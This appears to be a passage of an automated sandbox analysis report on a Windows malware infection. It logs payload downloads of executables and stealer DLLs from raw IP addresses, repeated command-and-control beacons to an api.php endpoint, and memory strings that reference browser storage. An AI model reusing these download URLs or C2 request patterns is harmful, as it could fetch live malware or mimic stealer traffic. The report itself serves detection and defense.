                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /large/hello.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: GET /lend/build16666.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/sqlite3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /down/1qWbf4Bsej2u.exe HTTP/1.1Host: 43.153.49.49:8888
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/freebl3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/mozglue.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/msvcp140.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/nss3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /Freshbuild.exe HTTP/1.1Host: 185.172.128.116
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/softokn3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/vcruntime140.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/see.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/see.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/see.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /lend/newstart.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: GET /large/see.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: GET /large/ZharkBOT.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /large/see.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C&tsk=5A HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /large/svchost.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C&tsk=5C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: see.exe, 0000001C.00000002.3876408152.0000000002776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
                                Source: see.exe, 0000001C.00000002.3876408152.0000000002776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.0000000002776000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,]q equals www.youtube.com (Youtube)
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,]q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: bflow-musico.fun
                                Source: global trafficDNS traffic detected: DNS query: foodbook.live
                                Source: global trafficDNS traffic detected: DNS query: tmpfiles.org
                                Source: global trafficDNS traffic detected: DNS query: api.proxyscrape.com
                                Source: unknownHTTP traffic detected: POST /Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJwFkKrnpbzuRzpMpICBW59RiiZWn5BOMbrxA80cyNHFH6KB%2FS9qBjCCf9IE8dNPX1TZw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.Content-Length: 96Host: bflow-musico.fun
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 13 Jul 2024 05:07:18 GMTServer: ApacheVary: Accept-EncodingConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8Proxy-Authenticate: Basic realm=""errorMsg: Unsupported protocoData Raw: Data Ascii:
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Freshbuild.exe
